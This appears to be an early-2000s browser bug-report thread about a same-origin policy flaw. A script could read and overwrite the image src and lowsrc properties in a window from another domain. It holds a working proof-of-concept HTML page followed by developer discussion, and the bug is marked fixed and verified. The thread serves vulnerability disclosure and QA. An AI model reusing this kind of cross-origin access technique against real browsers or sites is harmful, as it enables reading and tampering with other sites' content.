load 6/01 build 1. go to http://cathyz/origin/image.html 2. click "hack image src" 3. wait for a while, see the src of image of another domain, and you are also able to change the src of the image. the code is: ---------------http://cathyz/origin/image.html-------------------------<html> <head> <script> var newin; function getSrc() { newin=window.open("http://cathyz2/sameori/image.html","newinow"); setTimeout("document.F1.T1.value='SRC value is ' + newin.document.images[0].s rc;", 6000); setTimeout("document.F1.T2.value='LOWSRC value is ' + newin.document.images[0 ].lowsrc;", 6000); setTimeout("newin.document.images[0].src='http://cathyz2/images/lowstar.gif' ;", 7000); setTimeout("newin.document.images[0].lowsrc='http://cathyz2/images/highstar.g if';", 7000); } </script> </head> <body> <a href=javascript:void(0) onClick="getSrc()"> hack src of image</a> <form name="F1"> <input type=text size=50 name="T1"> <br> <input type=text size=50 name="T2"> </form> </body> </html>

ok.. so you shouldn't be able to work with .src of an image in a window from a different domain. should you be able to do _anything_ with images in window from another domain -- even find out how many there are?

No. You are correct, Jesse.

Was bug 39083 somehow fixed without fixing this? It seems to me that they were the same bug (able to access document.images across domains), but mstoltz's 05/26/2000 16:28 checkin comments imply that bug 39083 was about innerHTML. Since I'm not that experienced with DOM (especially cross-window), I'm probably missing something fairly obvious.

Assigning QA to czhang

Hmm, we do have a check for htmlimageelement.src and .lowsrc, but that check doesn't seem to be happening here. I'm not sure why. Changing all properties to sameOrigin by default would fix this, but there may be a more localized solution if necessary. Marking as dependent on the safe-default bug, and nominating nsbeta2.

nsbeta2+

Fixed.

verified